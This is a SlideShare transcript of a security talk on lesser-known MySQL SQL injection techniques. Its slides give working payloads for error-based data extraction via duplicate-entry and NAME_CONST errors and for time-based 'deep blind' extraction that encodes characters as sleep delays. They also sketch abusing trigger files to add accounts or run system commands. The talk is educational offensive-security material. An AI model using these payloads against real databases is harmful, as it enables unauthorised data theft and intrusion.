Your SlideShare is downloading. ×
關於SQL Injection的那些奇技淫巧
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

關於SQL Injection的那些奇技淫巧

2,831

Published on

Published in: Technology
0 Comments
7 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,831
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
72
Comments
0
Likes
7
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. 關於SQL Injection的那些奇技淫巧 Orange@chroot.org
  • 2. SQL Injection ?
  • 3. • Havij• Pangolin• DSQL tool• NBSI / HBSI• BSQL Hacker• Domain tools• SQLmap etc……
  • 4. This talk is about MySQL !
  • 5. MySQL Injection (Maybe you know)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  • 6. MySQL Injection (Maybe you knowmore.)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  • 7. MySQL Development History Feature MySQL Series 1 Unions 4.0 Subqueries 2 4.1 R-trees 4.1 (for the MyISAM storage engine) Stored procedures and functions 3 5.0 Views 5.0 Cursors 5.0 XA transactions 5.0 Triggers 4 5.0 and 5.1 Event scheduler 5.1 Partitioning 5.1 Pluggable storage engine API 5.1 Plugin API 5.1 InnoDB Plugin 5.1 Row-based replication 5.1 Server log tables 5.1
  • 8. MySQL (1/3)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  • 9. Error Base Injection• Like Injection in SQL server• When to use ? – Insert injection – Update injection – 同樣參數在多個 table 查詢中 – Query 的資訊不會顯示在頁面中• How to implement ? – Duplicate Error – Function Error
  • 10. Select * from (Select 1,1) as x Duplicate column name 1
  • 11. Select * from (select * from user as a join user as b) as x Duplicate column name Host
  • 12. Select * from (select * from user as a join user as b using(Host)) as x Duplicate column name User
  • 13. Select * from (Select user(),user()) as x Will show user name ?
  • 14. NoDuplicate column name user()
  • 15. NAME_CONST(name ,value)Causes the column to have the given name.
  • 16. SelectNAME_CONST(a,1),NAME_CONST(b,2) a b 1 2
  • 17. Select * from (SelectNAME_CONST(user(),1),NAME_CONST(user(),1)) as x
  • 18. MySQL patched it• MySQL > 5.1 – NAME_CONST() can not use again. – Argument must be const.
  • 19. • select * from (select count(*),concat((select (select user()) from information_schema.tables limit 0,1), floor(rand(0)*2)) as x from information_schema.tables group by x) as a• ERROR 1062 (23000): Duplicate entry root@localhost1 for key 1
  • 20. What is Duplicate Entry Error?
  • 21. SELECT *FROM ( SELECT COUNT( * ) , CONCAT( USER( ) , FLOOR 2 ( RAND( ) *2 ) ) FROM mysql.user GROUP BY 2) AS a 1• ERROR 1062 (23000): Duplicate entry root@localhost1 for key 1
  • 22. Demo
  • 23. MySQL (2/3)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• I/O – Load_file – Into outfile
  • 24. Deep Blind Injection• Status 200 or 500 ?• Time base quick or slow ?• a -> 0x97 – 9 -> delay 9 seconds – 7 -> delay 7 seconds• So, one char can be solved in two requests.
  • 25. Deep Blind InjectionDECLARE @x as int;DECLARE @w as char(6);SET@x=ASCII(SUBSTRING(master.dbo.fn_varbintohexstr(CAST({QUERY} asvarbinary(8000))),{POSITION},1));IF @x>=97 SET @x=@x-87 ELSE SET @x=@x-48;SET @w=0:0:+CAST(@x*{SECONDS} as char);WAITFOR DELAY @w
  • 26. Deep Blind Injection• if( ord(substring(hex(user()),1,1))>=97, sleep(ord(substring(hex(user()),1,1))-87), sleep(ord(substring(hex(user()),1,1))-48))Implemented by BSQL Hacker
  • 27. MySQL (3/3)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Triggers • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  • 28. MySQL Triggers A trigger is a named database object that isassociated with a table, and that activates when a particular event occurs for the table.
  • 29. When a triggers created• MySQL/data/database/ – table_name.TRG – atk.TRN• When update/delete/insert will check above file.• Generate by self ?
  • 30. How to Exploit it• Update / Insert data ?• Add a MySQL account ?• Exploit it with UDF ? – Cause the MySQL server stop. – Maybe a Security Feature or a Bug.• A SQL injection can run system command !
  • 31. Demo
  • 32. Thanks : )

×